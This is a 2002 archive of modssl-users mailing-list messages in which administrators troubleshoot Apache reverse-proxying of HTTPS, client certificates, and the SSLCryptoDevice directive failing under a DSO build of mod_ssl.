	from exchange00.SC.ESILICON.COM id XAA11853; Thu, 27 Jun 2002 23:43:59 +0200 (MET DST)
Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19)
	id ; Thu, 27 Jun 2002 14:43:52 -0700
Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D2074@exchange00.SC.ESILICON.COM>
From: David Marshall 
To: "'modssl-users@modssl.org'" 
Subject: RE: Reverse Proxy https question
Date: Thu, 27 Jun 2002 14:43:51 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Marshall 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I did not believe that the packet headers had enough information for Apache
to determine what to do. So, it must decrpyt the message with the
certificate. 



-----Original Message-----
From: Michael [mailto:iplanet_user@hotmail.com]
Sent: Thursday, June 27, 2002 2:29 PM
To: modssl-users@modssl.org
Subject: Re: Reverse Proxy https question


As I understand SSL, the packet headers remain unencrypted , the content is
encrypted. Hence the ability of routers throughout the Internet to route SSL
packets.


----- Original Message -----
From: "Aryeh Katz" 
To: 
Sent: Thursday, June 27, 2002 05:23
Subject: Re: Reverse Proxy https question


> I don't understand something.
> If the Apache proxy server is not going to decrypt the packets, how will
it know where to send it?
> Aryeh
> > I am trying to Reverse ProxyHTTPS connections in the following
> > manner:
> >
> > CLIENT Browser (https://secure-site.com) -> Apache 2.0 Reverse Proxy,
> > posing as secure-site.com (non-ssl, non-decrypting, just passing the
> > https through) -> Sonicwall SSL Accelerator (a stand-alone HW device
> > for SSL decryption/encryption, hosting the certificate forsecure-
> > site.com, decrypting the SSL connection) -> WEBSERVER (non-SSL)
> >
> > The purpose for this design is to keep the webserver behind a layer of
> > switches (for VLANS and ACLS) and Cisco Content Servers (which act as
> > a router and load balancer) and keep the Apache proxy server as the
> > "edge presence" of the website.
> >
> > What happens with this configuration is:
> > 1) The client browser connects to the Apache proxy
> > 2) The Apache proxy server connects to the SSL accelerator with HTTPS
> > sucessfully, as seen in the debug-level Apache log files. 3) The
> > browser waits, waits and waits... 4) The Apache proxy sits, sits and
> > sits. 5) The Webserver DOES see the non-ssl connection. The
> > information in the access log is:
> >  "Client IPAddress- - [25/Jun/2002:17:04:18 -0700] "?L /
> > HTTP/1.0" 302 0 "
> > 5) Eventually the client browser gives up and times out.
> >
> > If I install the certificate for secure-site.com on the Apache
> > reverse proxy server and enable SSL, then the Apache reverse proxy
> > will connect with SSL to both the browser and the downstream
> > webserver. This works, but is pointless as it loads the Proxy server's
> > CPU with SSL encryption/decryption. That's what we have the SSL
> > accelerators for.
> >
> >
> > What is missing in my config? Is this setup even possible?
> > Any comments?
> >
> > Thanks in advance.
> >
> > -Michael
> >
> >
> > --------------
> >
> >
> > This is the Apache config I am using:
> > ----------
> > Listen IPAddress:443
> > LogLevel debug
> > 
> >  SSLProxyEngine On
> >  ServerName web-site
> >  ProxyPass / https://secure-site.com
> >  ProxyPassReverse / https://secure-site.com
> > 
> >
> >
> > ------------
> > Server version: Apache/2.0.39
> > Server built: Jun 25 2002 16:11:49
> >
> > -----------
> > Compiled in modules:
> >  core.c
> >  mod_access.c
> >  mod_auth.c
> >  mod_include.c
> >  mod_log_config.c
> >  mod_env.c
> >  mod_setenvif.c
> >  mod_proxy.c
> >  proxy_connect.c
> >  proxy_ftp.c
> >  proxy_http.c
> >  mod_ssl.c
> >  prefork.c
> >  http_core.c
> >  mod_mime.c
> >  mod_status.c
> >  mod_autoindex.c
> >  mod_asis.c
> >  mod_cgi.c
> >  mod_negotiation.c
> >  mod_dir.c
> >  mod_imap.c
> >  mod_actions.c
> >  mod_userdir.c
> >  mod_alias.c
> >  mod_so.c
> >
> >
> >
>
>
> ---
> Aryeh Katz
> VASCO
> www.vasco.com
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 00:42:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA17518; Fri, 28 Jun 2002 00:41:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from blueyonder.co.uk id AAA17447; Fri, 28 Jun 2002 00:40:42 +0200 (MET DST)
Received: from pcow057o.blueyonder.co.uk ([127.0.0.1]) by blueyonder.co.uk  with Microsoft SMTPSVC(5.5.1877.757.75);
	 Thu, 27 Jun 2002 23:30:39 +0100
Received: from carlos.wd21.co.uk (unverified [80.195.33.100]) by pcow057o.blueyonder.co.uk
 (Content Technologies SMTPRS 4.2.9) with ESMTP id  for ;
 Thu, 27 Jun 2002 23:28:07 +0100
Received: from www-data by carlos.wd21.co.uk with local (Exim 3.35 #1 (Debian))
	id 17NhpX-0005Lw-00
	for ; Thu, 27 Jun 2002 23:33:35 +0100
To: modssl-users@modssl.org
Subject: RE: Reverse Proxy https question
Message-ID: <1025217215.3d1b92bf6be30@wd21.dyndns.org>
Date: Thu, 27 Jun 2002 23:33:35 +0100 (BST)
From: Michael Pacey 
References: <691874941F1F954198F7E7FCBAEF1FAE0D2074@exchange00.SC.ESILICON.COM>
In-Reply-To: <691874941F1F954198F7E7FCBAEF1FAE0D2074@exchange00.SC.ESILICON.COM>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: IMP/PHP IMAP webmail program 2.2.6
X-Originating-IP: 192.168.0.11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Pacey 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Quoting David Marshall :

> I did not believe that the packet headers had enough information for
> Apache
> to determine what to do. So, it must decrpyt the message with the
> certificate. 


That's right. For Apache to accept an SSL connection as a reverse proxy it must
decode it. What Michael wants is a generic TCP proxy.

Think of it this way. When you configure Apache to accept SSL you have to have
configure it with an SSL certificate. Why? So it can authenticate and
subsequently decrypt the packets.

Furthermore Apache cannot act as in initiator of SSL connections; I've spent
many many hours testing this and everybody I've asked has said the same. I'd
look at the code but I have no reason to believe there's any there to do this.

The only way Apache can act as an SSL proxy is using the CONNECT method as a
forward proxy. This is not what he is looking for.

Squid can't do this either. Nor can Apache derived servers like IBM HTTPServer
or Stronghold.

I shouldn't think it would be all that hard to modify Apache to do it. However I
don't see the point when what you are doing is emulating a TCP proxy. Unless you
want caching or content based routing.

There are many generic TCP proxies. Look on Freshmeat or Sourceforge; or your
average firewall like Firewall-1 can do this.

IBM Edgeserver (the Caching Proxy component) has this capability too.

But there are many possible scenarios and requirements; for some there is no one
product to do the job.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 01:18:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA21955; Fri, 28 Jun 2002 01:17:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from blueyonder.co.uk id BAA21914; Fri, 28 Jun 2002 01:16:51 +0200 (MET DST)
Received: from pcow058m.blueyonder.co.uk ([127.0.0.1]) by blueyonder.co.uk  with Microsoft SMTPSVC(5.5.1877.757.75);
	 Thu, 27 Jun 2002 23:54:06 +0100
Received: from carlos.wd21.co.uk (unverified [80.195.33.100]) by pcow058m.blueyonder.co.uk
 (Content Technologies SMTPRS 4.2.9) with ESMTP id  for ;
 Thu, 27 Jun 2002 23:51:08 +0100
Received: from www-data by carlos.wd21.co.uk with local (Exim 3.35 #1 (Debian))
	id 17NiBo-0005O5-00
	for ; Thu, 27 Jun 2002 23:56:36 +0100
To: modssl-users@modssl.org
Subject: RE: Reverse Proxy https question
Message-ID: <1025218596.3d1b9824e8698@wd21.dyndns.org>
Date: Thu, 27 Jun 2002 23:56:36 +0100 (BST)
From: Michael Pacey 
References: <691874941F1F954198F7E7FCBAEF1FAE0D2074@exchange00.SC.ESILICON.COM> <1025217215.3d1b92bf6be30@wd21.dyndns.org>
In-Reply-To: <1025217215.3d1b92bf6be30@wd21.dyndns.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: IMP/PHP IMAP webmail program 2.2.6
X-Originating-IP: 192.168.0.11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Pacey 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Quoting Michael Pacey :

> Furthermore Apache cannot act as in initiator of SSL connections; I've
> spent
> many many hours testing this and everybody I've asked has said the same.
> I'd
> look at the code but I have no reason to believe there's any there to do
> this.

I've looked at the code. I couldn't find any SSL client code.

--
Web: http://sydb.dyndns.org
ICQ: 152392113 (New to ICQ? http://www.mirabilis.com)
IRC: #sydb on EFnet (New to IRC? http://www.irchelp.org)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 06:09:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA28925; Fri, 28 Jun 2002 06:08:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id GAA28886; Fri, 28 Jun 2002 06:08:02 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id CD7914CE61C; Fri, 28 Jun 2002 03:02:22 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id F2E56286B3; Thu, 27 Jun 2002 23:06:45 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail-gw1.volvo.se id VAA24465; Thu, 27 Jun 2002 21:08:43 +0200 (MET DST)
Message-ID: 
From: Saunders Jack 
To: "'modssl-users@modssl.org'" 
Subject: CLient/Server Certificates
Date: Thu, 27 Jun 2002 20:54:38 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Saunders Jack 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am running Apache 1.3.26 with mod_ssl/openssl.  I have configured a server certificate from versign and https communication works great.  However I am trying to now configure client certs.  I have configured apache to trust the CA.  But now if I have a browser that tries a https connection without a certificate imported in the browser I get a page cannot be found error.  How can both types of certificates exist in apache without stopping https communication for everyone.  Some resources will use server to browser 128 bit encryption and others may require client certs.

Thanks

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 06:23:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA00558; Fri, 28 Jun 2002 06:22:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from poe.poyntons.com.au id GAA00531; Fri, 28 Jun 2002 06:21:59 +0200 (MET DST)
Received: (from uucp@localhost)
	by poe.poyntons.com.au (8.8.8+Sun/8.8.8) id MAA16620
	for ; Fri, 28 Jun 2002 12:21:14 +0800 (WST)
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2
Date: Fri, 28 Jun 2002 12:23:06 +0800
From: "James Bromberger" 
To: 
Subject: SSLCryptoDevice: works as a static, not as a DSO...?
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
X-MESSAGE-TID: "PG1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnPgoyMDAyMDYyOC0xMjIxMTM="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "James Bromberger" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hey people.

I have been running fine with Apache + Mod_SSL under Solaris with
everything working fine. I am now recompiling to Apache 1.3.26, Mod_SSL
2.8.10, OpenSSL 0.9.6d, and MM1.1.3. My httpd.conf is pretty much the
default, except for just above the SSLPassPhraseDialog (around line
1090) where I have:
	SSLCryptoDevice cswift

(it is a Sun Cyrpto Accelerator 1 (just a rebadged CryptoSwift) in a
Netra T1, on Solaris 8)


There are two compiles I have done: one where I have done everything as
a static, and one where it is DSO. When static, I removed my LoadModules
and AddModules, and of course, when as a DSO, I add these back in. ALl
pretty straight forward.

When I use static, my hardware crypto is working and everything is
wonderful. Birds sing, etc...

When I go DSO and then `apachectl configtest`:

	Invalid command 'SSLCryptoDevice', perhaps mis-spelled 
	or defined by a module not included in the server configuration

Which is odd, because all the other SSL directives are OK. If I do a
`strings libexec/libssl.so` then I can see that the SSLCryptoDevice is
mentioned in the module, however using mod_info, it is not mentioned
against mod_ssl as being available.

Does anyone know what is going on here? Why would this work fine as a
static, and not as a DSO? This was working with earlier versions (1.3.20
& 2.8.4 & 0.9.6b). 

Any help appreciate.

	James

-- 
  James Bromberger,
  Senior Web/Systems Administrator, JDV
  +61 8 9268 2909, +61 417 322 500
  Fax: +61 8 9266 0200

JDV - e-Commerce and Outsourcing Solutions for Financial Services
http://www.jdv.com/

JDV is a division of Hartleys Limited ABN 67 009 136 029 ("JDV").
Any securities recommendation contained in this document is unsolicited
general information only. Do not act on a recommendation without first
consulting your investment advisor to determine whether the
recommendation is appropriate for your investment objectives, financial
situation and particular needs.
JDV  believes that any information or advice (including any securities
recommendation) contained in this document is accurate when issued.
However, JDV does not warrant its accuracy or reliability. JDV, its
officers, agents and employees exclude all liability whatsoever,
in negligence or otherwise, for any loss or damage relating to this
document to the full extent permitted by law.
JDV may collect personal information from you in order to provide any
services you have requested.  A copy of JDV's privacy policy is
available at http://www.jdv.com/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 07:46:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA08878; Fri, 28 Jun 2002 07:45:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id HAA08788; Fri, 28 Jun 2002 07:44:40 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id BAA05261
	for ; Fri, 28 Jun 2002 01:45:39 -0400
Date: Fri, 28 Jun 2002 01:45:39 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: SSLCryptoDevice: works as a static, not as a DSO...?
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


It might depend upon how you compliled openssl, was it compiled shared
also?

Thanks,

Ron DuFresne


On Fri, 28 Jun 2002, James Bromberger wrote:

> Hey people.
> 
> I have been running fine with Apache + Mod_SSL under Solaris with
> everything working fine. I am now recompiling to Apache 1.3.26, Mod_SSL
> 2.8.10, OpenSSL 0.9.6d, and MM1.1.3. My httpd.conf is pretty much the
> default, except for just above the SSLPassPhraseDialog (around line
> 1090) where I have:
> 	SSLCryptoDevice cswift
> 
> (it is a Sun Cyrpto Accelerator 1 (just a rebadged CryptoSwift) in a
> Netra T1, on Solaris 8)
> 
> 
> There are two compiles I have done: one where I have done everything as
> a static, and one where it is DSO. When static, I removed my LoadModules
> and AddModules, and of course, when as a DSO, I add these back in. ALl
> pretty straight forward.
> 
> When I use static, my hardware crypto is working and everything is
> wonderful. Birds sing, etc...
> 
> When I go DSO and then `apachectl configtest`:
> 
> 	Invalid command 'SSLCryptoDevice', perhaps mis-spelled 
> 	or defined by a module not included in the server configuration
> 
> Which is odd, because all the other SSL directives are OK. If I do a
> `strings libexec/libssl.so` then I can see that the SSLCryptoDevice is
> mentioned in the module, however using mod_info, it is not mentioned
> against mod_ssl as being available.
> 
> Does anyone know what is going on here? Why would this work fine as a
> static, and not as a DSO? This was working with earlier versions (1.3.20
> & 2.8.4 & 0.9.6b). 
> 
> Any help appreciate.
> 
> 	James
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 08:19:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA12691; Fri, 28 Jun 2002 08:18:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from outpost.poyntons.com.au id IAA12625; Fri, 28 Jun 2002 08:17:27 +0200 (MET DST)
Received: (from uucp@localhost)
	by outpost.poyntons.com.au (8.8.8+Sun/8.8.8) id OAA15173
	for ; Fri, 28 Jun 2002 14:16:30 +0800 (WST)
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2
Date: Fri, 28 Jun 2002 14:18:22 +0800
From: "James Bromberger" 
To: 
Subject: Re: SSLCryptoDevice: works as a static, not as a DSO...?
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "James Bromberger" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Thanks Ron... I just did this, and there was no change -- it still
doesn't like this directive:
	Invalid command 'SSLCryptoDevice', perhaps mis-spelled 
	or defined by a module not included in the server configuration

My build was effectively:
	cd openssl* && sh config -fPIC -DSSL_EXPERIMENTAL shared && make
&& cd ..
	cd mm-1.1.3 && ./configure --disable-shared && make && cd ..
	cd mod_ssl-2.8.10-1.3.26 && ./configure
--with-apache=../apache_1.3.26 \
		--with-ssl=../openssl-engine-0.9.6d \
		--with-mm=../mm-1.1.3 \
		--enable-rule=SSL_EXPERIMENTAL \
		--enable-module=ssl \
		--prefix=/usr/local/apache --enable-shared=ssl \
		--enable-module=most \
		--enable-shared=max --enable-module=so && cd ..
	cd apache_1.3.26 && make && make install
package-root=`pwd`/package-root


The difference I am doing is removing the "--enable-shared=ssl" and
"--enable-shared=max", and then it works (as a static).

Thanks,

	James
>>> dufresne@sysinfo.com 06/28/02 01:45pm >>>

It might depend upon how you compliled openssl, was it compiled shared
also?

Thanks,

Ron DuFresne


On Fri, 28 Jun 2002, James Bromberger wrote:

> Hey people.
> 
> I have been running fine with Apache + Mod_SSL under Solaris with
> everything working fine. I am now recompiling to Apache 1.3.26,
Mod_SSL
> 2.8.10, OpenSSL 0.9.6d, and MM1.1.3. My httpd.conf is pretty much
the
> default, except for just above the SSLPassPhraseDialog (around line
> 1090) where I have:
> 	SSLCryptoDevice cswift
> 
> (it is a Sun Cyrpto Accelerator 1 (just a rebadged CryptoSwift) in a
> Netra T1, on Solaris 8)
> 
> 
> There are two compiles I have done: one where I have done everything
as
> a static, and one where it is DSO. When static, I removed my
LoadModules
> and AddModules, and of course, when as a DSO, I add these back in.
ALl
> pretty straight forward.
> 
> When I use static, my hardware crypto is working and everything is
> wonderful. Birds sing, etc...
> 
> When I go DSO and then `apachectl configtest`:
> 
> 	Invalid command 'SSLCryptoDevice', perhaps mis-spelled 
> 	or defined by a module not included in the server configuration
> 
> Which is odd, because all the other SSL directives are OK. If I do a
> `strings libexec/libssl.so` then I can see that the SSLCryptoDevice
is
> mentioned in the module, however using mod_info, it is not mentioned
> against mod_ssl as being available.
> 
> Does anyone know what is going on here? Why would this work fine as
a
> static, and not as a DSO? This was working with earlier versions
(1.3.20
> & 2.8.4 & 0.9.6b). 
> 
> Any help appreciate.
> 
> 	James
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com 

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org

User Support Mailing List                      modssl-users@modssl.org

Automated List Manager                            majordomo@modssl.org



-- 
  James Bromberger,
  Senior Web/Systems Administrator, JDV
  +61 8 9268 2909, +61 417 322 500
  Fax: +61 8 9266 0200

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 09:14:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA18500; Fri, 28 Jun 2002 09:13:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.virginia.edu id JAA18470; Fri, 28 Jun 2002 09:13:08 +0200 (MET DST)
Received: from node14.unix.virginia.edu by mail.virginia.edu id aa21671;
          28 Jun 2002 3:13 EDT
Received: from localhost (jcw5q@localhost)
	by node14.unix.Virginia.EDU (8.9.3/8.9.3) with ESMTP id DAA22242
	for ; Fri, 28 Jun 2002 03:13:03 -0400
X-Authentication-Warning: node14.unix.Virginia.EDU: jcw5q owned process doing -bs
Date: Fri, 28 Jun 2002 03:13:03 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender:  
To: modssl-users@modssl.org
MMDF-Warning:  Parse error in original version of preceding line at mail.virginia.edu
Subject: Re: SSLCryptoDevice: works as a static, not as a DSO...? (fwd)
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


[[ None of my emails from this evening seem to have actually gone out
   (misconfig on my end, I think), so here's this again.  Sorry if it's
   a dupe. ]]

---------- Forwarded message ----------
Date: Fri, 28 Jun 2002 02:24:29 -0400 (EDT)
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: SSLCryptoDevice: works as a static, not as a DSO...?

On Fri, 28 Jun 2002, Cliff Woolley wrote:

> To ask a silly question, you are *loading* the DSO, right?  And you have
> SSL_EXPERIMENTAL_ENGINE defined in both cases?

I guess I didn't read your first email carefully enough; I see you already
mentioned that you do have the appropriate AddModule and LoadModule lines
in the DSO case.  Double-check that, though, as that and the
SSL_EXPERIMENTAL_ENGINE things are the only possible reasons you'd get
that message.

--Cliff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 28 09:16:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA18834; Fri, 28 Jun 2002 09:15:58 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id JAA18680; Fri, 28 Jun 2002 09:14:56 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id DAA05853;
	Fri, 28 Jun 2002 03:15:57 -0400
Date: Fri, 28 Jun 2002 03:15:56 -0400 (EDT)
From: "R. DuFresne" 
To: James Bromberger 
cc: modssl-users@modssl.org
Subject: Re: SSLCryptoDevice: works as a static, not as a DSO...?
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I was thinking, and perhaps wrongly for versions prior to apache 2, that
modules required openssl be shared, but, earlier mod-ssl based versions I
do not think were so limited, being how they were built with ssl support.

I'm pretty sure, and others will correct me if I'm wrong that openssl, the
engine version, is the part that enables cryto devices , and the documentation for it should define those devices it
supports;

This is from the README.ENGINE file for openssl-engine-0.9.6b/, note that
this is not the most current version, and 0.9.6d might well have new
device support:


  ENGINE
  ======

  With OpenSSL 0.9.6, a new component has been added to support external
  crypto devices, for example accelerator cards.  The component is called
  ENGINE, and has still a pretty experimental status and almost no
  documentation.  It's designed to be faily easily extensible by the
  calling programs.

  There's currently built-in support for the following crypto devices:

      o CryptoSwift
      o Compaq Atalla
      o nCipher CHIL

...

  No external crypto device is chosen unless you say so.  You have
  actively tell the openssl utility commands to use it through a new
  command line switch called "-engine".  And if you want to use the ENGINE
  library to do something similar, you must also explicitely choose an
  external crypto device, or the built-in crypto routines will be used,
  just as in the default OpenSSL distribution.


  PROBLEMS
  ========

  It seems like the ENGINE part doesn't work too well with Cryptoswift on
  Win32.  A quick test done right before the release showed that trying
  "openssl speed -engine cswift" generated errors.  If the DSO gets
  enabled, an attempt is made to write at memory address 0x00000002.


Unfortunately, the documentation on the engine directives is fairly poor
and sparse.

If I recall, others have used such devices with the engine version and may
well beable to help you more then I can at present.  They should respond a
tad later in the day as the sun rises near their locations .

Sorry I'm not of more help here.

Thanks,

Ron DuFresne


On Fri, 28 Jun 2002, James Bromberger wrote:

> 
> Thanks Ron... I just did this, and there was no change -- it still
> doesn't like this directive:
> 	Invalid command 'SSLCryptoDevice', perhaps mis-spelled 
> 	or defined by a module not included in the server configuration
> 
> My build was effectively:
> 	cd openssl* && sh config -fPIC -DSSL_EXPERIMENTAL shared && make
> && cd ..
> 	cd mm-1.1.3 && ./configure --disable-shared && make && cd ..
> 	cd mod_ssl-2.8.10-1.3.26 && ./configure
> --with-apache=../apache_1.3.26 \
> 		--with-ssl=../openssl-engine-0.9.6d \
> 		--with-mm=../mm-1.1.3 \
> 		--enable-rule=SSL_EXPERIMENTAL \
> 		--enable-module=ssl \
> 		--prefix=/usr/local/apache --enable-shared=ssl \
> 		--enable-module=most \
> 		--enable-shared=max --enable-module=so && cd ..
> 	cd apache_1.3.26 && make && make install
> package-root=`pwd`/package-root
> 
> 
> The difference I am doing is removing the "--enable-shared=ssl" and
> "--enable-shared=max", and then it works (as a static).
> 
> Thanks,
> 
> 	James
> >>> dufresne@sysinfo.com 06/28/02 01:45pm >>>
> 
> It might depend upon how you compliled openssl, was it compiled shared
> also?
> 
> Thanks,
> 
> Ron DuFresne
> 
> 
> On Fri, 28 Jun 2002, James Bromberger wrote:
> 
> > Hey people.
> > 
> > I have been running fine with Apache + Mod_SSL under Solaris with
> > everything working fine. I am now recompiling to Apache 1.3.26,
> Mod_SSL
> > 2.8.10, OpenSSL 0.9.6d, and MM1.1.3. My httpd.conf is pretty much
> the
> > default, except for just above the SSLPassPhraseDialog (around line
> > 1090) where I have:
> > 	SSLCryptoDevice cswift
> > 
> > (it is a Sun Cyrpto Accelerator 1 (just a rebadged CryptoSwift) in a
> > Netra T1, on Solaris 8)
> > 
> > 
> > There are two compiles I have done: one where I have done everything
> as
> > a static, and one where it is DSO. When static, I removed my
> LoadModules
> > and AddModules, and of course, when as a DSO, I add these back in.
> ALl
> > pretty straight forward.
> > 
> > When I use static, my hardware crypto is working and everything is
> > wonderful. Birds sing, etc...
> > 
> > When I go DSO and then `apachectl configtest`:
> > 
> > 	Invalid command 'SSLCryptoDevice', perhaps mis-spelled 
> > 	or defined by a module not included in the server configuration
> > 
> > Which is odd, because all the other SSL directives are OK. If I do a
> > `strings libexec/libssl.so` then I can see that the SSLCryptoDevice
> is
> > mentioned in the module, however using mod_info, it is not mentioned
> > against mod_ssl as being available.
> > 
> > Does anyone know what is going on here? Why would this work fine as
> a
> > static, and not as a DSO? This was working with earlier versions
> (1.3.20
> > & 2.8.4 & 0.9.6b). 
> > 
> > Any help appreciate.
> > 
> > 	James
> > 
> > 
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
